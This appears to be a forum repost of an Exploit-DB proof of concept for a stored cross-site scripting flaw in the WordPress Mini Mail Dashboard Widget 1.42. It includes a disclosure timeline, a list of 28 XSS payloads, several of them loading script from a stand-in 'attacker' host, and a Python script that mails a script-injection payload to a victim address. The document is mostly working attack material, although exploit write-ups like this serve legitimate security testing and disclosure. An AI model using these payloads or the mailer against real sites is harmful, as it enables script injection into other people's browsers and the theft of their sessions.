sendMail(dstemail, frmemail, smtpsrv, username, password) Sursa

Wordpress Mini Mail Dashboard Widget 1.42 Stored XSS [table=width: 500, class: grid] [tr] [td]EDB-ID: 20358[/td] [td]CVE: 2012-2583[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: loneferret[/td] [td]Published: 2012-08-08[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] #!/usr/bin/python ''' Author: loneferret of Offensive Security Product: Mini Mail Dashboard Widget Version: 1.42 Software Download: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/ Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 14 Jul 2012: Version 1.43 released 08 Aug 2012: Public Disclosure Installed On: Ubuntu Server LAMP 8.04 Wordpress: 3.3.1 Client Test OS: Window XP Pro SP3 (x86) Browser Used: Internet Explorer 8 Extra note: To execute the XSS, a user needs to click 'view in HTML' Injection Point: Body Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 2: <SCRIPT>alert('XSS')</SCRIPT> 3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5: <DIV STYLE="width: expression(alert('XSS'));"> 6: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 7: exp/*<XSS STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> 8: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 9: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> 10: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 11: <XSS STYLE="xss:expression(alert('XSS'))"> 12: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 13: <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> 14: <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-- 15: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT> 16: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 17: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 18: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 19: <<SCRIPT>alert("XSS");//<</SCRIPT> 20: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 21: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> 22: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT> 23: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 24: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT> 25: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT> 26: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT> 27: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 28: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT> ''' import smtplib, urllib2 payload = """<SCRIPT>alert('XSS')</SCRIPT>""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local\n" msg += "To: victim@victim.local\n" msg += 'Date: Today\r\n' msg += "Subject: XSS\n" msg += "Content-type: text/html\n\n" msg += "XSS" + payload + "\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password) Sursa